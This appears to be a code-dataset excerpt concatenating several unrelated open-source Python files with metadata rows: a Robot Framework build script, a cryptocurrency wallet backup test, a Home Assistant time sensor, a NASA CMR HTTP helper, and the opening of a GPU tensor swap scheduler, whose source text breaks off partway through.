filename = 'jython-standalone-{0}.jar'.format(version)
url = (f'http://search.maven.org/remotecontent?filepath=org/python/'
f'jython-standalone/{version}/{filename}')
return get_extlib_file(filename, url)
def get_pyyaml(version):
filename = f'PyYAML-{version}.tar.gz'
url = f'https://pypi.python.org/packages/source/P/PyYAML/{filename}'
return get_extlib_file(filename, url)
def get_extlib_file(filename, url):
lib = Path('ext-lib')
path = Path(lib, filename)
if path.exists():
return path
print(f"'{filename}' not found, downloading it from '{url}'.")
lib.mkdir(exist_ok=True)
urlretrieve(url, path)
return path
def extract_and_copy_pyyaml_files(version, filename, build_dir='build'):
extracted = Path(tempfile.gettempdir(), 'pyyaml-for-robot')
if extracted.is_dir():
shutil.rmtree(str(extracted))
print(f"Extracting '{filename}' to '{extracted}'.")
with tarfile.open(filename) as t:
t.extractall(extracted)
source = Path(extracted, f'PyYAML-{version}', 'lib', 'yaml')
target = Path(build_dir, 'Lib', 'yaml')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
def compile_java_files(ctx, jython_jar, build_dir='build'):
root = Path('src/java/org/robotframework')
files = [str(path) for path in root.iterdir() if path.suffix == '.java']
print(f'Compiling {len(files)} Java files.')
ctx.run(f"javac -d {build_dir} -target 1.7 -source 1.7 -cp {jython_jar} "
f"{' '.join(files)}")
def unzip_jar(path, target='build'):
zipfile.ZipFile(path).extractall(target)
def copy_robot_files(build_dir='build'):
source = Path('src', 'robot')
target = Path(build_dir, 'Lib', 'robot')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
shutil.rmtree(str(Path(target, 'htmldata', 'testdata')))
def compile_python_files(ctx, jython_jar, build_dir='build'):
ctx.run(f"java -jar {jython_jar} -m compileall -x '.*3.py' {build_dir}")
# Jython will not work without its py-files, but robot will
for directory, _, files in os.walk(str(Path(build_dir, 'Lib', 'robot'))):
for name in files:
if name.endswith('.py'):
Path(directory, name).unlink()
def create_robot_jar(ctx, version, source='build'):
write_manifest(version, source)
target = Path(f'dist/robotframework-{version}.jar')
ctx.run(f'jar cvfM {target} -C {source} .')
print(f"Created '{target}'.")
def write_manifest(version, build_dir='build'):
with open(Path(build_dir, 'META-INF', 'MANIFEST.MF'), 'w') as mf:
mf.write(f'''\
Manifest-Version: 1.0
Main-Class: org.robotframework.RobotFramework
Specification-Version: 2
Implementation-Version: {version}
''')
| 36.23741 | 118 | 0.694163 | [
"ECL-2.0",
"Apache-2.0"
] | ConradDjedjebi/robotframework | tasks.py | 10,074 | Python |
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet backup features.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from decimal import Decimal
import os
from random import randint
import shutil
from test_framework.test_framework import AgroCoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletBackupTest(AgroCoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
# nodes 1, 2,3 are spenders, let's give them a keypool=100
# whitelist all peers to speed up tx relay / mempool sync
self.extra_args = [
["[email protected]", "-keypool=100"],
["[email protected]", "-keypool=100"],
["[email protected]", "-keypool=100"],
["[email protected]"],
]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
self.sync_mempools()
self.nodes[3].generate(1)
self.sync_blocks()
# As above, this mirrors the original bash test.
def start_three(self, args=()):
self.start_node(0, self.extra_args[0] + list(args))
self.start_node(1, self.extra_args[1] + list(args))
self.start_node(2, self.extra_args[2] + list(args))
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
def stop_three(self):
self.stop_node(0)
self.stop_node(1)
self.stop_node(2)
def erase_three(self):
os.remove(os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
def init_three(self):
self.init_wallet(0)
self.init_wallet(1)
self.init_wallet(2)
def run_test(self):
self.log.info("Generating initial blockchain")
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[1].generate(1)
self.sync_blocks()
self.nodes[2].generate(1)
self.sync_blocks()
self.nodes[3].generate(100)
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
self.log.info("Creating transactions")
# Five rounds of sending each other transactions.
for _ in range(5):
self.do_one_round()
self.log.info("Backing up")
self.nodes[0].backupwallet(os.path.join(self.nodes[0].datadir, 'wallet.bak'))
self.nodes[1].backupwallet(os.path.join(self.nodes[1].datadir, 'wallet.bak'))
self.nodes[2].backupwallet(os.path.join(self.nodes[2].datadir, 'wallet.bak'))
if not self.options.descriptors:
self.nodes[0].dumpwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].dumpwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].dumpwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.log.info("More transactions")
for _ in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
self.log.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
# Restore wallets from backup
shutil.copyfile(os.path.join(self.nodes[0].datadir, 'wallet.bak'), os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[1].datadir, 'wallet.bak'), os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[2].datadir, 'wallet.bak'), os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
self.log.info("Re-starting nodes")
self.start_three()
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if not self.options.descriptors:
self.log.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
self.start_three(["-nowallet"])
self.init_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].importwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].importwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
# Backup to source wallet file must fail
sourcePaths = [
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, '.', 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets')]
for sourcePath in sourcePaths:
assert_raises_rpc_error(-4, "backup failed", self.nodes[0].backupwallet, sourcePath)
if __name__ == '__main__':
WalletBackupTest().main()
| 38.722944 | 187 | 0.650755 | [
"MIT"
] | tcoin01/Agrocoin | test/functional/wallet_backup.py | 8,945 | Python |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from robot.utils import StringIO
from robot.output import LOGGER
from robot.utils import decode_output, encode_output, JYTHON
class OutputCapturer(object):
def __init__(self, library_import=False):
self._library_import = library_import
self._python_out = PythonCapturer(stdout=True)
self._python_err = PythonCapturer(stdout=False)
self._java_out = JavaCapturer(stdout=True)
self._java_err = JavaCapturer(stdout=False)
def __enter__(self):
if self._library_import:
LOGGER.enable_library_import_logging()
return self
def __exit__(self, exc_type, exc_value, exc_trace):
self._release_and_log()
if self._library_import:
LOGGER.disable_library_import_logging()
return False
def _release_and_log(self):
stdout, stderr = self._release()
if stdout:
LOGGER.log_output(stdout)
if stderr:
LOGGER.log_output(stderr)
sys.__stderr__.write(encode_output(stderr))
def _release(self):
stdout = self._python_out.release() + self._java_out.release()
stderr = self._python_err.release() + self._java_err.release()
return stdout, stderr
class PythonCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = sys.stdout
self._set_stream = self._set_stdout
else:
self._original = sys.stderr
self._set_stream = self._set_stderr
self._stream = StringIO()
self._set_stream(self._stream)
def _set_stdout(self, stream):
sys.stdout = stream
def _set_stderr(self, stream):
sys.stderr = stream
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
try:
return self._get_value(self._stream)
finally:
self._stream.close()
self._avoid_at_exit_errors(self._stream)
def _get_value(self, stream):
try:
return decode_output(stream.getvalue())
except UnicodeError:
# Error occurs if non-ASCII chars logged both as str and unicode.
stream.buf = decode_output(stream.buf)
stream.buflist = [decode_output(item) for item in stream.buflist]
return stream.getvalue()
def _avoid_at_exit_errors(self, stream):
# Avoid ValueError at program exit when logging module tries to call
# methods of streams it has intercepted that are already closed.
# Which methods are called, and does logging silence possible errors,
# depends on Python/Jython version. For related discussion see
# http://bugs.python.org/issue6333
stream.write = lambda s: None
stream.flush = lambda: None
if not JYTHON:
class JavaCapturer(object):
def __init__(self, stdout=True):
pass
def release(self):
return u''
else:
from java.io import ByteArrayOutputStream, PrintStream
from java.lang import System
class JavaCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = System.out
self._set_stream = System.setOut
else:
self._original = System.err
self._set_stream = System.setErr
self._bytes = ByteArrayOutputStream()
self._stream = PrintStream(self._bytes, False, 'UTF-8')
self._set_stream(self._stream)
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
self._stream.close()
output = self._bytes.toString('UTF-8')
self._bytes.reset()
return output
| 32.686131 | 77 | 0.648504 | [
"ECL-2.0",
"Apache-2.0"
] | moto-timo/robotframework | src/robot/running/outputcapture.py | 4,478 | Python |
"""A module for useful functions.
:author: Matthew Gidden <matthew.gidden _at_ gmail.com>
"""
import numpy as np
rms = lambda a, axis=None: np.sqrt(np.mean(np.square(a), axis=axis))
| 23.5 | 68 | 0.696809 | [
"BSD-3-Clause"
] | gidden/cyclopts | cyclopts/functionals.py | 188 | Python |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
from datetime import timedelta
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_DISPLAY_OPTIONS
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_STR_FORMAT = '%H:%M'
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Internet Time',
'time_utc': 'Time (UTC)',
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_DISPLAY_OPTIONS, default=['time']):
vol.All(cv.ensure_list, [vol.In(OPTION_TYPES)]),
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Setup the Time and Date sensor."""
if hass.config.time_zone is None:
_LOGGER.error("Timezone is not set in Home Assistant configuration")
return False
devices = []
for variable in config[CONF_DISPLAY_OPTIONS]:
devices.append(TimeDateSensor(variable))
hass.loop.create_task(async_add_devices(devices, True))
return True
class TimeDateSensor(Entity):
"""Implementation of a Time and Date sensor."""
def __init__(self, option_type):
"""Initialize the sensor."""
self._name = OPTION_TYPES[option_type]
self.type = option_type
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if 'date' in self.type and 'time' in self.type:
return 'mdi:calendar-clock'
elif 'date' in self.type:
return 'mdi:calendar'
else:
return 'mdi:clock'
@asyncio.coroutine
def async_update(self):
"""Get the latest data and updates the states."""
time_date = dt_util.utcnow()
time = dt_util.as_local(time_date).strftime(TIME_STR_FORMAT)
time_utc = time_date.strftime(TIME_STR_FORMAT)
date = dt_util.as_local(time_date).date().isoformat()
# Calculate Swatch Internet Time.
time_bmt = time_date + timedelta(hours=1)
delta = timedelta(
hours=time_bmt.hour, minutes=time_bmt.minute,
seconds=time_bmt.second, microseconds=time_bmt.microsecond)
beat = int((delta.seconds + delta.microseconds / 1000000.0) / 86.4)
if self.type == 'time':
self._state = time
elif self.type == 'date':
self._state = date
elif self.type == 'date_time':
self._state = '{}, {}'.format(date, time)
elif self.type == 'time_date':
self._state = '{}, {}'.format(time, date)
elif self.type == 'time_utc':
self._state = time_utc
elif self.type == 'beat':
self._state = '@{0:03d}'.format(beat)
| 30.40367 | 79 | 0.645142 | [
"MIT"
] | mweinelt/home-assistant | homeassistant/components/sensor/time_date.py | 3,314 | Python |
# NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR)
#
# https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html
#
# Copyright (c) 2020 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
date 2020-11-05
since 0.0
"""
import json
import logging
import urllib.parse
import urllib.request
import cmr.util.common as common
logging.basicConfig(level = logging.ERROR)
logger = logging.getLogger('cmr.util.network')
def get_local_ip():
"""Rewrite this stub, it is used in code not checked in yet """
return '127.0.0.1'
def value_to_param(key, value):
"""
Convert a key value pair into a URL parameter pair
"""
value = str(value)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result = encoded_key + "=" + encoded_value
return result
def expand_parameter_to_parameters(key, parameter):
"""
Convert a list of values into a list of URL parameters
"""
result = []
if isinstance(parameter, list):
for item in parameter:
param = value_to_param(key, item)
result.append(param)
else:
value = str(parameter)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result.append(encoded_key + "=" + encoded_value)
return result
def expand_query_to_parameters(query=None):
""" Convert a dictionary to URL parameters """
params = []
if query is None:
return ""
keys = sorted(query.keys())
for key in keys:
value = query[key]
params = params + expand_parameter_to_parameters(key, value)
return "&".join(params)
def apply_headers_to_request(req, headers):
"""Apply a headers to a urllib request object """
if headers is not None and req is not None:
for key in headers:
value = headers[key]
if value is not None and len(value)>0:
req.add_header(key, value)
def transform_results(results, keys_of_interest):
"""
Take a list of results and convert them to a multi valued dictionary. The
real world use case is to take values from a list of collections and pass
them to a granule search.
[{key1:value1},{key1:value2},...] -> {"key1": [value1,value2]} ->
&key1=value1&key1=value2 ( via expand_query_to_parameters() )
"""
params = {}
for item in results:
for key in keys_of_interest:
if key in item:
value = item[key]
if key in params:
params[key].append(value)
else:
params[key] = [value]
return params
def config_to_header(config, source_key, headers, destination_key=None, default=None):
"""
Copy a value in the config into a header dictionary for use by urllib. Written
to reduce boiler plate code
config[key] -> [or default] -> [rename] -> headers[key]
Parameters:
config(dictionary): where to look for values
source_key(string): name if configuration in config
headers(dictionary): where to copy values to
destination_key(string): name of key to save to in headers
default(string): value to use if value can not be found in config
"""
config = common.always(config)
if destination_key is None:
destination_key = source_key
value = config.get(source_key, default)
if destination_key is not None and value is not None:
if headers is None:
headers = {}
headers[destination_key] = value
return headers
def post(url, body, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
"""
if isinstance(body, str):
#JSON string or other such text passed in"
data = body
else:
# Do not use the standard url encoder `urllib.parse.urlencode(body)` for
# the body/data because it can not handle repeating values as required
# by CMR. For example: `{'entry_title': ['2', '3']}` must become
# `entry_title=2&entry_title=3` not `entry_title=[2, 3]`
data = expand_query_to_parameters(body)
data = data.encode('utf-8')
logger.debug(" Headers->CMR= %s", headers)
logger.debug(" POST Data= %s", data)
req = urllib.request.Request(url, data)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
def get(url, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
client_id (string): name of the client making the (not python or curl)
headers (dictionary): HTTP headers to apply
"""
logger.debug(" Headers->CMR= %s", headers)
req = urllib.request.Request(url)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
if isinstance(obj_json, list):
data = obj_json
obj_json = {"hits": len(data), "items" : data}
#print (obj_json)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
#obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
| 38.032922 | 100 | 0.62757 | [
"Apache-2.0"
] | nasa/eo-metadata-tools | CMR/python/cmr/util/network.py | 9,242 | Python |
import copy
from enum import Enum
import multiprocessing
import numpy as np
from functools import cmp_to_key
import plotly as py
import plotly.figure_factory as ff
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly
from collections import defaultdict
import os
from pynvml import *
import time
import matplotlib
# matplotlib.use('Agg')
import pickle
import numpy as np
from pynvml import *
from keras.models import Sequential, load_model
from keras.layers import Dense, Conv1D, MaxPool1D, Dropout, Flatten
from matplotlib import cm
from tensorboard.plugins.hparams import keras
from line_profiler import LineProfiler
from typing import List
def get_PCIE_bandwidth():
# if not debug_mod:
# PCIE_bandwidth = nvmlDeviceGetPcieThroughput(handle, NVML_PCIE_UTIL_COUNT) # KB/s => MB/ms
# PCIE_bandwidth /= 1000000
# else:
PCIE_bandwidth = 12
return PCIE_bandwidth
GPU = int(os.environ['CUDA_VISIBLE_DEVICES'])
debug_mod = False
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(GPU)
pyplt = py.offline.plot
PCIE_bandwidth = get_PCIE_bandwidth()
load_list = ['convolution_2d_forward_VALID', 'convolution_backward_filter_2d_VALID', 'convolution_backward_data_2d_VALID',
'convolution_2d_forward_SAME', 'convolution_backward_filter_2d_SAME', 'convolution_backward_data_2d_SAME',
'dropout_forward', 'dropout_backward', 'broadcast_to_NHWC',
'broadcast_to_NCHW', 'reduce_sum_new_NHWC', 'reduce_sum_new_NCHW',
'bn_forward_pre_activation', 'bn_backward_pre_activation', 'activation_forward_relu',
'activation_backward_relu', 'activation_forward_softmax', 'activation_backward_softmax',
'pooling_2d_forward_max', 'pooling_2d_backward_max', 'pooling_2d_forward_mean',
'pooling_2d_backward_mean', 'matrix_multiply', 'matrix_elementwise_multiply_by_const', 'matrix_elementwise_add',
'array_set', 'concat_forward', 'concat_a_backward',
'concat_b_backward', 'sgd_update', 'cross', 'cross_backward', 'adam_mv', 'adam_compute']
optimizer_op = ['AdamOp']
class TaskType(Enum):
swap_out = 0
swap_in = 1
class AccessType(Enum):
output = 0
input = 1
class Tensor:
def __init__(self, tensor_id, job_id, size, shape, recomputation_time, source_tensors=None, is_parameter=False, is_input_or_output=False):
self.tensor_id = tensor_id
self.job_id = job_id
self.size = size
self.swap_time = self.size / PCIE_bandwidth
self.source_tensors = source_tensors if source_tensors is not None else []
self.recomputation_time = recomputation_time
self.recomputation_metric = self.size / self.recomputation_time
self.is_parameter = is_parameter
self.shape = shape
if self.is_parameter or is_input_or_output:
self.in_gpu_at_beginning = True
else:
self.in_gpu_at_beginning = False
def __repr__(self):
return f'tensor_id:{self.tensor_id}, job_id":{self.job_id}, size:{self.size}'
def update_swap_time(self):
PCIE_bandwidth = get_PCIE_bandwidth()
# print(f'PCIE_bandwidth:{PCIE_bandwidth}')
self.swap_time = self.size / PCIE_bandwidth
class TensorAccess:
def __init__(self, tensor, time, run_time, access_type, operation_id, operation_name):
self.tensor = tensor
self.access_id = None
self.start_time = None
self.end_time = None
self.time = time
self.run_time = run_time
self.access_type = access_type
if self.access_type == AccessType.output:
self.end_time = self.time
self.start_time = self.time - self.run_time
else:
self.start_time = self.time
self.end_time = self.time + self.run_time
self.release_flag = False
self.operation_id = operation_id
self.operation_name = operation_name
self.release_for_recomputation = []
def to_tuple(self):
return (self.tensor.tensor_id, self.time)
def __repr__(self):
return f'id={self.tensor.tensor_id}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}, access_type={self.access_type}, release_flag={self.release_flag}'
class SwapTask(object):
'''Date weighted interval'''
def __init__(self, tensor, time, time_cost, task_type: TaskType, front_boundary=None, back_boundary=None):
self.tensor = tensor
self.time_cost = time_cost
self.data_type = np.float64
self.task_type = task_type
self.swap_task_id = None
assert not (front_boundary is None and back_boundary is None)
# 最早开始时间
self.front_boundary = front_boundary
# 最晚结束时间
self.back_boundary = back_boundary
self.time = time
self.execute_time = None
self.execute_ref = None
self.start_time_ = None
self.end_time_ = None
@property
def start_time(self):
return self.start_time_
@start_time.setter
def start_time(self, value):
self.start_time_ = value
if self.task_type == TaskType.swap_out:
self.time = self.start_time_
@property
def end_time(self):
return self.end_time_
@end_time.setter
def end_time(self, value):
self.end_time_ = value
if self.task_type == TaskType.swap_in:
self.time = self.end_time_
@classmethod
def from_access(cls, access: TensorAccess, weight, task_type, front_boundary=None, back_boundary=None):
return cls(access.tensor, weight, access.time, access.tensor.swap_time, task_type, front_boundary=front_boundary, back_boundary=back_boundary)
def __repr__(self):
return f'id={self.tensor}, type={self.task_type}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}'
def numpy_ewma_vectorized(data, window):
alpha = 2 / (window + 1.0)
alpha_rev = 1 - alpha
n = data.shape[0]
pows = alpha_rev ** (np.arange(n + 1))
scale_arr = 1 / pows[:-1]
offset = data[0] * pows[1:]
pw0 = alpha * alpha_rev ** (n - 1)
mult = data * pw0 * scale_arr
cumsums = mult.cumsum()
out = offset + cumsums * scale_arr[::-1]
return out
debug_num = 0
def create_model(n):
model = Sequential()
model.add(Dense(units=2048, activation='tanh', input_dim=n))
model.add(Dense(units=2048, activation='tanh'))
model.add(Dense(units=1, activation='relu'))
return model
def load(opname, n):
model = create_model(n)
model.load_weights('model_parameter/' + opname + '_model.hdf5', by_name=True, skip_mismatch=True)
return model
def get_predicted_execution_time(op_name, inputs_of_model, logged_time: list):
return logged_time[0]
def liveness_analysis(tensor_access_list):
global tensor_access_by_tensor
# 活跃性分析结果生成
for job_id in range(len(tensor_access_list)):
tmp = set()
for i in range(len(tensor_access_list[job_id]) - 1, -1, -1):
tensor_access = tensor_access_list[job_id][i]
accesses_of_tensor = tensor_access_by_tensor[tensor_access.tensor.job_id][tensor_access.tensor]
if tensor_access.tensor not in tmp and len(accesses_of_tensor) > 1 and tensor_access == accesses_of_tensor[-1]:
# 参数不会释放
if not tensor_access.tensor.is_parameter:
tmp.add(tensor_access.tensor)
tensor_access.release_flag = True
def is_overlap(task: SwapTask, target: SwapTask):
return task != target and (
target.start_time < task.end_time < target.end_time or target.start_time < task.start_time < target.end_time or task.start_time < target.end_time < task.end_time or task.start_time < target.start_time < task.end_time)
def get_free_intervals(target_task, swap_schedule, access_of_target_tensor, key=0, asc=True):
target_task.tensor.update_swap_time()
# 列出在可行区间内的所有空白时间区间,并按区间排序
if target_task.back_boundary - target_task.front_boundary < target_task.time_cost:
return []
intervals = []
for task in swap_schedule:
# if target_task.back_boundary < task.start_time:
# continue
# elif task.end_time < target_task.front_boundary:
# break
if target_task.front_boundary <= task.start_time < task.end_time <= target_task.back_boundary:
intervals.append((task.start_time, task.end_time))
elif task.start_time < target_task.front_boundary < task.end_time < target_task.back_boundary:
intervals.append((target_task.front_boundary, task.end_time))
elif target_task.front_boundary < task.start_time < target_task.back_boundary < task.end_time:
intervals.append((task.start_time, target_task.back_boundary))
elif task.start_time < target_task.front_boundary < target_task.back_boundary < task.end_time:
return []
intervals = sorted(intervals, key=lambda x: x[0])
# 区间融合,确保区间之间无交集
occupied_intervals = []
i = 0
while i < len(intervals):
interval = intervals[i]
l = interval[0]
r = interval[1]
flag = False
while i < len(intervals) - 1 and intervals[i + 1][0] <= r:
r = max(r, intervals[i + 1][1])
flag = True
i += 1
occupied_intervals.append((l, r))
if not flag:
i += 1
not_occupied_intervals = []
s = target_task.front_boundary
for interval in occupied_intervals:
if s < interval[0]:
not_occupied_intervals.append((s, interval[0]))
s = interval[1]
if s < target_task.back_boundary:
not_occupied_intervals.append((s, target_task.back_boundary))
if len(not_occupied_intervals) == 0:
return []
i = 0
j = 0
# 按照区间起点排序
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=False)
# 防止区间与被调度张量的access重合
while j < len(access_of_target_tensor):
if i >= len(not_occupied_intervals):
break
access = access_of_target_tensor[j]
start, end = not_occupied_intervals[i]
if start < access.start_time < end <= access.end_time:
not_occupied_intervals[i] = (start, access.start_time)
i += 1
elif start < access.start_time < access.end_time < end:
not_occupied_intervals[i] = (start, access.start_time)
